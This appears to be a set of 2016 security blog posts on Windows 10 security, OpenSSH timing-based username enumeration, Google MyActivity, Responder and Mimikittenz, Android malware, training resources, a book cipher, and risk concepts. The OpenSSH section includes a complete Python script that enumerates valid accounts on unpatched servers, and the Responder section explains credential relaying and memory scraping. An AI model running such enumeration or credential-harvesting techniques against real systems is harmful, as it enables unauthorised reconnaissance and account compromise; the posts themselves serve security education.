As of today, 2 August 2016, users will be able to upgrade their Windows 10 devices to the newest version, dubbed the Anniversary Update due to its release being roughly one year from the initial release of the Windows 10 operating system.

The new update provides a lot of new features to make life easier, such as new on-screen inking capabilities, extensions for the Edge browser, and even an Ubuntu-based Bash shell (the Windows Subsystem for Linux) for more advanced users. The update adds a significant number of security improvements as well, making it the most secure version of the operating system thus far:

  1. Added support for a third-party antivirus program to run alongside Windows Defender. Instead of Defender disabling itself entirely when another antivirus product is installed, the new Limited Periodic Scanning option (off by default) lets Defender keep running periodic scans without interfering with the other product, acting as an additional layer of defense.
  2. Windows Defender Advanced Threat Protection is a new service for Windows 10 Enterprise customers to detect, investigate and respond to advanced threats in a corporate environment.
  3. Windows Hello lets you sign in with biometrics (face, iris or fingerprint) rather than a password, and with this update also with a companion device such as a USB key or your phone. The biometric or PIN unlocks a key bound to the device, so possession of the device effectively becomes a second factor.
  4. The Edge browser gets new security features: Flash now runs in its own sandboxed process, and the browser itself runs in an AppContainer with fewer capabilities than before, reducing the number of Windows subsystems it can reach and limiting the damage a successful attack can cause.

This is of course in addition to the regular patches and security fixes that are included in the update as well.

Earlier today I was reading about an interesting vulnerability (CVE-2016-6210) present in current versions of OpenSSH; it is addressed in the 7.3 release. This isn’t a critical vulnerability that will get you root access, but it does provide the first half of the puzzle: the usernames. An SSH server should give no indication of whether or not a username is valid; it should return the same error whether the password was incorrect or the user does not exist.

OpenSSH follows this principle in its responses: the failure message is the same either way, and gives no hint as to why the login attempt failed. Unfortunately, while there is no difference in the message, there is one in timing. Researchers identified that a login attempt with an invalid username is rejected faster than a login attempt with an invalid password for a valid username. Using this time difference, we can tell whether or not the username actually exists.

The reason lies in the password hashing, not the encryption. When the username does not exist, sshd compares the supplied password against a hard-coded placeholder bcrypt ($2a$) hash, and bcrypt only ever looks at the first 72 bytes of its input (on systems whose crypt(3) does not support bcrypt at all it fails even faster). Real accounts on a typical Linux box have SHA-256 or SHA-512 crypt hashes in /etc/shadow, and those run the entire password through thousands of rounds. With a normal-length password the gap is lost in network jitter, but a 25,000-character password makes it large and easy to measure. Here is the script that the researchers wrote, which I tested against my own SSH server:

(Image: the researchers’ Python timing script, with the measured times listed next to each username)

In my run, the invalid users (jim, bob, mike, tom, sam) took 4-6 seconds to be rejected, whereas the valid user (rtheory) took 12-13 seconds. Changing the script to read usernames from a wordlist instead of keyboard input gives a simple (though slow) means of user account enumeration.
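Below is an added example of the approach, written for this page rather than taken from the researchers’ script or from the OpenSSH project. It assumes the paramiko library is installed and that the target still accepts password authentication and runs an sshd older than 7.3, where the issue is fixed; the host and a wordlist file name are the only inputs and are hypothetical. Rather than eyeballing seconds, it measures a baseline with a username that cannot exist and flags any candidate that takes more than a chosen multiple of that baseline. The probe function is injectable so the decision logic can be checked without a live server.

```python
"""Timing-based SSH username enumeration. Added example for this page, not the
researchers' script. Live probing needs paramiko; the decision logic does not."""
import argparse
import statistics
import time
import uuid

# bcrypt stops at 72 bytes, SHA-crypt does not, so a very long password makes
# the valid-user path measurably slower than the nonexistent-user path.
LONG_PASSWORD = "A" * 25000


def time_login(host, username, password=LONG_PASSWORD, port=22, timeout=60):
    """Make one password attempt and return the seconds until it was rejected."""
    import paramiko  # imported lazily so the offline parts work without it
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    start = time.monotonic()
    try:
        client.connect(host, port=port, username=username, password=password,
                       look_for_keys=False, allow_agent=False, timeout=timeout,
                       banner_timeout=timeout, auth_timeout=timeout)
    except paramiko.AuthenticationException:
        pass  # the expected outcome: we never send a correct password
    finally:
        client.close()
    return time.monotonic() - start


def enumerate_users(host, candidates, probe=time_login, control_samples=3, factor=2.0):
    """Compare each candidate's rejection time with a baseline measured for a
    random username that certainly does not exist.
    Returns (verdicts, timings, baseline); verdict True means 'probably valid'."""
    control = "nosuchuser-" + uuid.uuid4().hex[:10]
    baseline = statistics.median(probe(host, control) for _ in range(control_samples))
    timings = {user: probe(host, user) for user in candidates}
    verdicts = {user: t > baseline * factor for user, t in timings.items()}
    return verdicts, timings, baseline


def main():
    ap = argparse.ArgumentParser(description="SSH user enumeration via crypt(3) timing")
    ap.add_argument("host")
    ap.add_argument("wordlist", help="file with one candidate username per line")
    ap.add_argument("--factor", type=float, default=2.0,
                    help="flag users slower than baseline*factor (default 2.0)")
    args = ap.parse_args()
    with open(args.wordlist) as fh:
        candidates = [line.strip() for line in fh if line.strip()]
    verdicts, timings, baseline = enumerate_users(args.host, candidates, factor=args.factor)
    print(f"baseline (nonexistent user): {baseline:.2f}s")
    for user in candidates:
        print(f"{user:20s} {timings[user]:6.2f}s  {'VALID' if verdicts[user] else 'no'}")


if __name__ == "__main__":
    main()
```

Usage is `python3 ssh_enum.py 203.0.113.5 users.txt` (file name hypothetical). The repeated control measurements and the generous timeout matter: a 25,000-character password can take tens of seconds on the valid-user path, and a single jittery rejection of a nonexistent user would otherwise skew the baseline.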

MyActivity

Google has recently made available a new service that lets you very easily see what data they have about you: your viewing habits, your devices, and even your location history. All of this information is now in one central place, called MyActivity, and can be found for your account at: https://myactivity.google.com

This page is generated for the account you log in with and is private to it (you cannot query another user’s information). Right on the front page you will find a surprising amount of information, including what you searched for and at what time (for any day), ads you may have clicked on, websites you visited, YouTube videos you watched, news articles you read, and much more. By default it shows this information chronologically, starting with today, and you can filter the data (or even search through it!) to see if something in particular is present.

If you click the menu icon, there is a link for “Other Google Activity” as well, which contains even more information about your account. This includes information from your phone, such as contacts, apps, and other data, as well as information gained from your phone’s GPS. This is perhaps the most amazing collection of data I found, and the most scary. The “Location History” section presents a map of everywhere Google knows you have been, and it is quite accurate. I was surprised that it knew about some of these locations, as they were either from a very long time ago or from times when I thought my GPS feature was turned off.

Even more interesting, though, is the Timeline feature of the location history. You can pick any day (e.g. January 11, 2016) and see a detailed description of where you went and at what times. Google nicely plotted out a map for me of my trip from home to work at precisely 7:36am, along with where I went for lunch from 11:55am-12:28pm, and my return trip from work to home at 5:15pm. On other days, it plotted out my entire errand runs, even pointing out and naming what stores I stopped at along the way. Yet another day, it plotted out my trip across the country I took, even specifically pointing out which Dunkin Donuts I stopped at, and which rest stops I detoured to, with exact times.

(Image: Location History timeline map)

With all of this said, Google is providing this to us not just to scare us into realizing how much they know about our daily lives, but to also delete it if we so choose. With each page, you have the option of telling Google to “forget” that specific instance, that specific day, week, month, or even just forget everything about you completely and start fresh. The latter option may impact your browsing experience, but the option is available to you now with the click of a button, and that is an important thing to know.

Pass the Salt

Corporate Windows environments have a difficult challenge when it comes to protecting sensitive information stored in memory. It is almost frightening just how much of your personal information and login credentials are sitting in memory in plaintext, sometimes readable by users without administrative privileges!

One such tool, responder.py, is a script that poisons LLMNR and NBT-NS name lookups on the local network and turns your machine into a rogue authentication server for a myriad of protocols: HTTP(S), MSSQL, SMB, FTP, LDAP, DNS and DHCP, among others. Whenever a targeted machine is tricked into connecting to your rogue server and authenticating to it, the credentials it presents are harvested and saved. On a Windows domain this quickly yields a list of NetNTLMv1/v2 challenge-response hashes. These are not the NT hashes that pass-the-hash uses, so they cannot simply be replayed; cracking them is nonetheless sometimes unnecessary, because the authentication attempt can instead be relayed live to another host that does not enforce SMB signing.

A new tool was also released recently, called Mimikittenz. If you are familiar with Mimikatz (scraping Windows credentials from LSASS memory), the goal is similar, but the approach is different: Mimikittenz is not a port of Mimikatz to PowerShell (that is Invoke-Mimikatz). Instead it calls the Windows ReadProcessMemory API from PowerShell and searches the memory of processes owned by the current user (browsers, mail clients and the like) with regular expressions for plaintext credentials, and the regex list is easy to extend for whatever applications you are targeting. Because it only reads processes the current user already owns, a non-administrator can run it, which is what makes it so versatile on a locked-down workstation.

(Image: Mimikittenz output)

This is definitely not the first time PowerShell has been used for malicious purposes. Since these are scripts rather than compiled programs, they are easy to obfuscate and often slip past signature-based antivirus. On Windows 10 and PowerShell 5 defenders do get some help: AMSI lets antivirus inspect script content at run time, and script block logging (event ID 4104) records what was actually executed. If PowerShell is not disabled or constrained for your users, be on the lookout for scripts like these.

For more information on Responder: https://github.com/SpiderLabs/Responder
For more information on Mimikittenz: https://github.com/putterpanda/mimikittenz

The spread of malware on the Android mobile platform seems to be getting more and more common. This week alone there were reports of two major rootkit-type variants that have affected millions of devices each. If you still think that phones do not need the same kind of security and antimalware protections as your home computer, you may want to think again.

The Hummingbad malware is currently up to 10 million infected users worldwide, 286,000 of them in the US. The main targets right now are in China and its vicinity, largely because China is the likely country of origin. Yingmob, the company alleged to be responsible, is reportedly also in some level of control of over 80 million Android devices and sells access to them. Hummingbad roots the phone using one of several exploits available to it, gaining administrative privileges that let it go on exploiting the device, and then installs other malicious apps that generate ad revenue for Yingmob, potentially up to $300,000 per month.

Similarly, Hummer was another form of Android malware, infecting up to 1.2 million devices every day. This repeated the same technique of rooting the phone and installing additional malicious applications. Due to the sheer enormity of daily infections, it is possible that this malware is generating up to $500,000 daily for the attackers.

(Image: Hummer infection statistics)

To stay out of the list of millions who get infected, install a reputable antivirus and security app on your Android device, if you own one. Also make sure that “Unknown sources” (installation of apps from outside the Play Store) is disabled in your settings. Finally, should an application (or even the system itself) ask for permissions, examine the request thoroughly and decline it if it does not make sense for what the app does.

To read more about Hummingbad and Hummer:

http://www.techrepublic.com/article/hummingbad-malware-infects-10-million-android-devices-millions-more-at-risk

http://www.techrepublic.com/article/1-2-million-infected-android-malware-hummer-could-be-biggest-trojan-ever

Do you like to learn new skills in cyber security? Do you enjoy learning on your own through books, videos, and online resources? I am very often looking for the next topic or skillset to spend time exploring, and over the years I have found a few websites that I can repeatedly rely on for a wide variety of free training material. I have compiled them below along with some bullet points on why each may be of value to you, as they have been to me.

Happy learning!

Open Security Training

  • 29 classes (13 with videos) ranging from beginner to advanced
  • Pick what you want and you can download the lesson in PowerPoint or PDF
  • Most classes with videos include downloadable videos instead of just YouTube links
  • Topics include:
    • Assembly, forensics, and reverse engineering for Android, ARM, Intel x86, and Intel x86-64, reverse engineering malware (from beginner to advanced)
    • Hacking techniques, software exploitation, Windows exploitation
    • Defensive techniques, flow analysis, network hunting
    • Cryptography, cryptology, cryptanalysis

SANS Cyber Aces

  • You can download the handouts/slides to review on your own
  • This is free SANS training pulled from their formal curriculum
  • Topics include Linux and Windows fundamentals, networking and the OSI model, and details into PHP, Bash, and PowerShell

Offensive Security, Metasploit Unleashed

  • Master many of the ins and outs of Metasploit. Don’t think it’s just a “script kiddie” tool; the pros depend on it too. This will give you the knowledge on how to use it for custom and much more advanced attacks.
  • Good for both Metasploit novices and more experienced users
  • From scanning, to exploit development, to scripting, and maintaining access
  • Highly recommended if you want to advance your skillset
  • Click the red box under “MSFU Navigation” to get started

Cybrary

  • These are all video-based courses
  • Registration required, but you get free access to hundreds of hours worth of training videos
  • Offers beginner through advanced courses
  • Topics include crypto, python, exploitation, malware analysis, offensive and defensive techniques

SecurityTube

  • This is like a YouTube website specifically for cyber offense and defense learning
  • Highly recommend checking out the videos under “Megaprimers”, which include:
    • Metasploit Framework
    • Exploit Research
    • Windows & Linux Assembly
    • Buffer Overflow
    • Format Strings

Packt Publishing

  • Tons of digital books and videos on an incredible range of cyber security tools, programming languages, and technologies
  • A free and downloadable e-book is given away every day

In the course that I am taking, we are developing a threat modeling process that we can use for our respective organizations. One critical piece of threat modeling is having a listing of credible sources available to you; this list should contain sources that cover information on specific threat trends, vulnerability information, software and system updates, and other news related to security trends and major events. The benefit to this is that you always have a resource to go to when trying to threat model a system.

What I found useful was setting up a feed reader to monitor a variety of websites. Whenever an article is posted on any of the sites, its title and a short description appear in the feed. I use Feedly.com for this because it is easy to get started with. Here is a listing of the feeds that I am currently watching:

  • CIO Security
  • Nextgov
  • Naked Security
  • SANS Internet Storm Center, InfoCON: green
  • InfoSec Resources
  • Schneier on Security
  • Securelist – Information about Viruses, Hackers and Spam
  • ZDNet security RSS
  • Paul’s Security Weekly
  • Metasploit
  • Room362
  • Security on TechRepublic
  • Darknet – The Darkside
  • Carnal0wnage & Attack Research Blog
  • GDS Security
  • MalwareTech
  • PortSwigger Web Security Blog
  • SANS Penetration Testing
  • US-CERT Alerts
  • Google Online Security Blog
  • Offensive Security
  • Dark Reading
  • DigiNinja
  • GNUCITIZEN
  • Reiners’ Weblog
  • SensePost Blog
  • SkullSecurity
  • TaoSecurity
  • Trustwave SpiderLabs Blog
  • WIRED

Note that not all of these are updated daily or even weekly, but together these resources provide a great central location for the latest news in cyber security. The variety helps ensure that a rounded and unbiased view is given of a large news item, and also helps make sure that smaller announcements, discoveries and vulnerabilities appear in the feed as well. I would highly recommend creating your own feed with the sources that are important to you.

What is “least privilege” and why is it important?

I would define least privilege as ensuring that all users, services, and accounts are running with the bare minimum of rights and access needed in order to function. If a particular right is not needed in order to perform a particular function, then you will not be assigned that right.

For example, let’s say you have a safe deposit box at your local bank. You have a key to it, and that key will only unlock your box. This bank is following the principle of least privilege: you only have access to exactly what you need (in this case, your box). If the bank were NOT following the principle of least privilege, they might have given you a master key instead. That key opens any box, and the bank is simply trusting that you will only open the one you need (your box).

This is why least privilege is so important. Without it, the user/service/account has more permissions than needed and is simply being trusted not to misuse them. Least privilege takes most of that trust out of the equation: holding only the key to their own box rather than the master key, they are strictly limited in the damage they can do (malicious or accidental), and yet they can still access everything they need without problem.

Implementing least privilege can take a lot of work, and that time and effort is probably why many organizations do not have it perfected. It is simply easier to just assign a new user with a broad swath of permissions that you know will work for him/her than to sit down and try to iron out exactly what they do and do not need access to.

In our example, it would be so much easier for the bank to just hand out master keys to everyone; they all get access to what they need, and the bank doesn’t need to spend the time making individual keys for each individual box and somehow keeping track of them all. Laziness is a common reason for not following the principle of least privilege.

Earlier today I was given a book cipher to try to decrypt (it is often lumped together with the running key cipher, which instead uses the book’s text as a key stream). I have experimented with dozens of different types of ciphers, but somehow this very basic one slipped past me and I had never heard of it before. It is really quite simple: the sender and receiver first agree on a book that they will each use as their key. The exact edition matters, because the cipher refers to page numbers, line numbers, and word numbers in order to spell out the secret message. The cipher is formatted as shown here:

x1,y1,z1;x2,y2,z2;x3,y3,z3;… x=page, y=line, z=word

So if you saw 2,7,1;3,2,1 this would mean the message is just two words long. The first word is on page 2, line 7, word 1. The second word is on page 3, line 2, word 1.

Let’s give it a shot. In my example, I’ll use a fairly popular book found on many shelves: The 7 Habits of Highly Effective People by Stephen Covey. Here is the ciphertext; let me know if you were able to decrypt it!

22,1,3; 17,14,12; 128,14,1; 186,7,9; 97,3,7; 256,21,6; 57,3,5; 24,1,10; 301,5,5
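As an added example (not from the original post), here is a small encoder and decoder for exactly this page,line,word scheme. The three-page “book” in it is made up for the example; with a real book you would load each page’s lines from a text file, and the loader below assumes pages are separated by form-feed characters. It uses the same 1-based coordinates as above, tolerates the spaces after the semicolons in the ciphertext, picks among repeated occurrences of a word when encoding, and rejects coordinates that run off the page, which is what happens when sender and receiver are holding different editions.

```python
"""Book cipher (page,line,word coordinates). Added example for this page; the
book text is constructed, not an excerpt from the book named above."""
import random
import re

# Constructed stand-in book: a list of pages, each a list of lines.
BOOK = [
    ["the quick brown fox jumps over the lazy dog",
     "meet me at the old bridge when the moon rises"],
    ["every secret has a price and every price a secret",
     "the river bends north past the mill at dawn"],
    ["send the package tonight and wait for my signal",
     "nobody saw the door open at noon"],
]

WORD_RE = re.compile(r"[a-z0-9']+")


def words_of(line):
    """Split a line into lowercase words, dropping punctuation so that
    'bridge,' and 'bridge' count as the same word."""
    return WORD_RE.findall(line.lower())


def load_book(text):
    """Split a plain-text book into pages on form feeds (an assumption about
    how the text file was prepared) and each page into lines."""
    return [page.splitlines() for page in text.split("\f")]


def build_index(book):
    """Map every word to all of its (page, line, word) positions, 1-based."""
    index = {}
    for p, page in enumerate(book, 1):
        for l, line in enumerate(page, 1):
            for w, word in enumerate(words_of(line), 1):
                index.setdefault(word, []).append((p, l, w))
    return index


def encode(message, book, rng=None):
    """Produce 'x,y,z;x,y,z;...' for the message, choosing randomly among the
    occurrences of each word so repeated words do not repeat coordinates."""
    rng = rng or random.Random()
    index = build_index(book)
    triples = []
    for word in words_of(message):
        if word not in index:
            raise ValueError(f"{word!r} does not appear in the book")
        triples.append(rng.choice(index[word]))
    return ";".join(",".join(map(str, t)) for t in triples)


def parse(ciphertext):
    """Parse 'x,y,z; x,y,z' into integer triples, ignoring stray whitespace."""
    triples = []
    for group in ciphertext.split(";"):
        group = group.strip()
        if group:
            p, l, w = (int(part) for part in group.split(","))
            triples.append((p, l, w))
    return triples


def decode(ciphertext, book):
    """Look each coordinate up in the book; a coordinate past the end of a
    page or line means the wrong edition (or a garbled ciphertext)."""
    out = []
    for p, l, w in parse(ciphertext):
        try:
            out.append(words_of(book[p - 1][l - 1])[w - 1])
        except IndexError:
            raise ValueError(f"no word at page {p}, line {l}, word {w}") from None
    return " ".join(out)


if __name__ == "__main__":
    ct = encode("Send the package tonight!", BOOK)
    print(ct, "->", decode(ct, BOOK))
    print(decode("1,2,1; 1,2,3; 1,1,1; 1,2,6; 2,2,8; 2,2,9", BOOK))
```

The same word-splitting rule is used on both sides, which is the one thing two people sharing a real book have to agree on beyond the edition: whether a hyphenated or punctuated word counts as one word or two.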

What is residual risk and why should an organization understand its importance?

Let’s say your organization has identified a risk. You have gone through the entire risk management process and have implemented the approved controls in order to mitigate this risk. Most of the time it truly is just “mitigation” of the risk, not complete removal of it. This means that there is still some risk left over that the control does not protect against; this is the residual risk.

Residual risk is not always a bad thing; however, it is important for an organization to know that it exists. There should never be the portrayal that a certain control has completely eliminated a specific risk (unless, on the rare occasion, that is truly the case). Senior leaders within the organization must be aware of this residual risk so that they can decide whether to change the control, add another control, or just accept the risk altogether and move on. The decision to accept the risk can only be made by leadership, so they must be made aware of it. While usually unlikely, it is still possible for a malicious or otherwise bad event to take place through this residual risk.

Just remember, even after controls have been put in place to protect against a threat, there is almost always still risk that remains! Identify it, and then either accept it or implement additional controls to protect against it.